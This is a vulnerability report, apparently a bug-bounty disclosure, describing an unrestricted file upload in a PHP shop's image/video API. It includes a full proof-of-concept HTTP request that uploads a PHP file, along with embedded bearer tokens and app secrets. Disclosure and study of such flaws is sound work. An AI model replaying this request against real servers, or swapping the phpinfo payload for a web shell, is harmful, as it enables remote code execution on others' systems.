Description

The vulnerability is in the api/ImageController.php file.

When $type is 2, it will enter the logic for uploading video files. However, the function $upload->video that handles video uploads does not detect the file suffix name. This results in arbitrary file uploads.

Proof of Concept

POST /index.php?q=/api/leadmall/image HTTP/1.1
Host: ???
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary="boundary"
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTYzMTYwOTMxOSwiZXhwIjoxNjMxNjk1NzE5LCJpZCI6MX0.PdqX6vNh2LZ607lnd0J6JiU_Wf_SnPu3bbXVz4gfXEk
QM-APP-TYPE: undefined
QM-APP-ID: 98c08c25f8136d590c
QM-APP-SECRET: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Content-Length: 1127
Origin: http://127.0.0.1:8777
Connection: close
Referer: http://127.0.0.1:8777/index.php?r=admin%2Findex
Cookie: _csrf=d31c94bc1ac116b99cf287a046dc1642965fba6d4232d378c5719685445276fba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22lrOxUbG2yPlq8P0DwPnuvxdNBXzu4wIh%22%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

--boundary
Content-Disposition: form-data; name="type"

2
--boundary
Content-Disposition: form-data; name="content"; filename="test.php"

<?php phpinfo();
--boundary--

Impact

This vulnerability can lead to users being able to upload arbitrary php files, which in turn can lead to RCE.